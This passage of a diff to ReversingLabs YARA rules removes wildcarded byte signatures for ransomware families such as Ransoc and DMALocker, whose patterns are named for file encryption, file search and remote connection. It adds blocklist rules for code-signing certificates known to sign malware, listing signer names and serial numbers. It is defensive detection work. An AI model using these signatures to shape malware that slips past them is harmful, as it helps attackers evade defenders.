?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? - ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ?? - ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A - } - $encrypt_folder_p1 = { - 1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? - ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 - ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? - A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72 - } - $encrypt_folder_p2 = { - A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13 - ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 - 32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 - 32 ?? 2A - } - $deep_search_p1 = { - 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ?? - ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? - ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 - } - $deep_search_p2 = { - 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E - 69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shenzhen Yunhuitianxia Technology Co.,Ltd." and pe.signatures[i].serial=="2d:f4:53:58:81:77:cf:1c:0c:29:7f:f4" and 1479735173<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "ae3ef9cf-4b67-5cb8-9c9b-3edb95da222c" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16690-L16706" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "75e3dfd593d7fdc268de54430be617c015957a624f2ca36bc0036d4cbde5b686" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($enum_folders) and ( all of ($deep_search_p*)) and ( all of ($encrypt_folder_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="06:19:c5:e3:9a:4f:c6:0a:32:f9:b0:7f:6a:4c:a3:28" and 1475884800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ransoc : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE { meta: - description = "Yara rule that detects Ransoc ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a990754e-eafa-5501-a123-bcbd5aa26ca6" - date = "2020-07-15" - modified = "2020-07-15" + id = "6a29551f-8359-5394-9acd-00c3b25d7064" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ransoc.yara#L1-L114" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1f48f1b713c18b099e863d8a11e872ae84df0ea355f01cba765e8333d8d98575" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16708-L16724" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "30a079b55b75b292f7af4f5ae99184cbb3cca1ce4cf20f2f5c961b533673db00" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ransoc" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $scan_for_services = { - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 89 - 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 - E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 - ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 - 89 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 - F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 66 39 2D ?? ?? - ?? ?? 73 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 66 01 1D ?? ?? ?? ?? 8B - FB 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? - ?? ?? 73 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 66 - 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? - EB ?? 85 FF 74 ?? 8D 44 24 ?? 50 E8 - } - $remote_connection = { - 8B 44 24 ?? 83 EC ?? 53 8B 5C 24 ?? 56 8B 74 24 ?? 50 56 E8 ?? ?? ?? ?? 8B D8 83 C4 - ?? 83 FB ?? 75 ?? 5E B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 4C 24 ?? 55 8B 6C 24 ?? 57 55 - 56 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 56 FF 15 ?? ?? ?? ?? 50 56 53 E8 - ?? ?? ?? ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8D - 47 ?? 5F 5D 5E 5B 83 C4 ?? C3 8B 44 24 ?? 85 C0 74 ?? 85 ED 74 ?? 55 50 53 E8 ?? ?? - ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B 83 C4 - ?? C3 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8D 49 ?? 8B 74 24 ?? - 8B C6 2B 44 24 ?? 75 ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 2B - 74 24 ?? 6A ?? 56 8D 54 24 ?? 56 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 53 FF D5 8B F8 85 FF - 78 ?? 2B C6 01 44 24 ?? EB ?? 29 74 24 ?? 83 FF ?? 74 ?? 85 FF 75 ?? 53 FF 15 ?? ?? - ?? ?? 85 FF 79 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B - 83 C4 ?? C3 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D - 8D 46 ?? 5E 5B 83 C4 ?? C3 8B 54 24 ?? 83 C2 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 4C 24 ?? - 8B 54 24 ?? 8B F8 8B 44 24 ?? 2B F0 83 C6 ?? 2B CE 51 03 F0 56 52 E8 ?? ?? ?? ?? 8D - 44 24 ?? 50 E8 - } - $encrypt_files = { - 81 EC ?? ?? ?? ?? 53 55 56 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? - 8B F8 FF D6 8B 8C 24 ?? ?? ?? ?? 8B E8 8B 84 24 ?? ?? ?? ?? 50 51 57 8D 94 24 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 - E8 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 89 4C 24 ?? BB ?? - ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? EB ?? 8D 49 ?? 55 68 ?? ?? ?? ?? 83 FB ?? 7E ?? 8D - 94 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? ?? 52 F3 A5 E8 ?? ?? - ?? ?? 8B BC 24 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? EB ?? 8D 84 24 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? 83 C4 ?? 6A ?? 8D 4C 24 ?? 6A ?? 51 - E8 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 44 24 ?? B9 ?? ?? ?? ?? 80 30 ?? 40 49 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 6A ?? - 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 51 8D - 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 8B FF 80 30 ?? 40 49 75 ?? 8D 54 24 ?? 52 - E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 8D - 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 54 24 - ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 83 FF ?? 72 ?? BE ?? ?? ?? ?? 8B 4C 24 ?? 56 8D - 44 24 ?? 50 51 E8 ?? ?? ?? ?? 01 74 24 ?? 2B FE 83 C4 ?? 43 89 BC 24 ?? ?? ?? ?? 85 - FF 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 - } - $find_files = { - 83 EC ?? 53 55 56 57 33 DB 68 ?? ?? ?? ?? 6A ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? - ?? 8B E8 8D 44 24 ?? 50 89 6C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 55 51 E8 ?? ?? ?? ?? - 8B 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 55 68 ?? ?? ?? - ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B F8 57 8D 54 24 ?? 52 8D 44 24 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 3B C3 75 ?? 8B 4C 24 ?? 51 8D 54 24 ?? 52 E8 ?? ?? - ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? - ?? ?? 8B 44 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 4C 24 ?? - 51 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ?? - ?? 83 C4 ?? 33 FF 39 5C 24 ?? 76 ?? 8D 64 24 ?? 8B 44 24 ?? 8B 0C B8 51 56 E8 ?? ?? - ?? ?? 47 83 C4 ?? 3B 7C 24 ?? 72 ?? 39 5C 24 ?? 75 ?? 8B 44 24 ?? 3B C3 74 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ?? - ?? 8B 44 24 ?? 83 C4 ?? 89 5C 24 ?? 3B C3 0F 86 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ?? - 8B 44 24 ?? 8B 4C 24 ?? 8B 1C 88 53 55 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 57 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8B E8 E8 ?? ?? ?? ?? 6A ?? 56 89 44 24 ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 56 E8 ?? ?? ?? ?? 33 C0 8D 54 24 ?? 55 52 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 - 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 - 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 44 24 ?? 50 56 - E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? - ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B D3 52 E8 ?? ?? - ?? ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 41 83 C4 ?? 89 4C 24 ?? 3B C8 0F 82 ?? ?? - ?? ?? 33 DB 33 F6 3B C3 76 ?? 8B 44 24 ?? 8B 0C B0 51 E8 ?? ?? ?? ?? 46 83 C4 ?? 3B - 74 24 ?? 72 ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? - 3B C3 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 3B C3 5B 74 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 83 C4 ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "A&D DOMUS LIMITED" and pe.signatures[i].serial=="2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" and 1554681600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "bd032608-8622-5c7a-a3a7-808d73e611d7" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16726-L16742" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e434a02f5b9b22a25d8fe7a0bb7bd81b1cd8bc5356b4b626e3bfceb3f554a085" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="34:ec:95:65:80:5f:34:20:4c:69:66:fb:81:e3:6b:a1" and 1476921600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "19930e7b-09cb-5c04-b838-3d8d73ba194b" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16744-L16762" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "37b254ab76d144c09cc7b622dba59f5e372bf01ae12ce260a06143abb52062f6" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MS CORP SOFTWARE LTD" and (pe.signatures[i].serial=="00:b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" or pe.signatures[i].serial=="b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09") and 1590710400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "6bdba43f-4003-5807-9adc-20691fbc8d14" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16764-L16780" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ca43c7bacd8cb5a896c3135abf4a131bdb4a7f5093e64c8d1df743fad0c1c64a" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Zhang" and pe.signatures[i].serial=="3a:1b:39:7f:d9:45:1e:3b:58:91:fc:69:68:1e:d7:3d" and 1470614400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "d2e66765-bdf6-59ff-ac6c-1a82ecefa731" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16782-L16798" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4e22568612aec050c7f78b81ba6749528a9c25c0ba43e14260a581a9bea7a2f0" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x96\\x84\\xE5\\x90\\x9B \\xE9\\x9F\\xA6" and pe.signatures[i].serial=="1e:b8:16:aa:49:e4:89:4d:9e:9f:78:72:9e:53:cd:48" and 1429056000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "46166e9e-515d-530a-a651-59821d979f01" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16800-L16816" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ce41d046a7ca320d034fa226b5e8c22022cc6bfc97eb9ef294b1aca232aaacef" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="38:3c:a8:8d:6d:93:79:c7:40:60:95:60" and 1478250214<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "df2423da-37ec-5adc-8497-2ac975b0b7ff" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16818-L16834" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c05349166919ffc18ac6ecb61b822a8365f87a82164c5e110ef94345bdc4de6f" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3 AM CHP" and pe.signatures[i].serial=="67:31:cb:14:30:f1:8b:8c:0c:43:ab:40:e1:15:41:69" and 1436313600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "3d078c5d-e469-54f1-bd69-aebeec1c25f1" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16836-L16852" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d6d0d5c86dd88afa29fb3c7cc3c0ab2e3401637a23e062ee9bab693a715cf16f" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and $scan_for_services and $find_files and $encrypt_files and $remote_connection + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shan Feng" and pe.signatures[i].serial=="15:95:05:e6:45:6b:9a:93:52:f7:c4:71:68:d8:9b:96" and 1469404800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Dmalocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE { meta: - description = "Yara rule that detects DMALocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3ddef0f1-61c9-59f6-a02c-35768c2cd4d6" - date = "2020-07-15" - modified = "2020-07-15" + id = "c6ba359e-4883-534d-bc86-8c063e54c92f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DMALocker.yara#L1-L149" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "107dbc4cacd9d451e9c6fe8aa91cd612f70ac767ee70f74f3a77d1e5548b054f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16854-L16870" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ff2a2d06c48bd3426fa42526d966152e3e7166c4170b4e08bb65ee5d876eda93" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DMALocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $dmalock_v1_encrypt_files_1 = { - 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 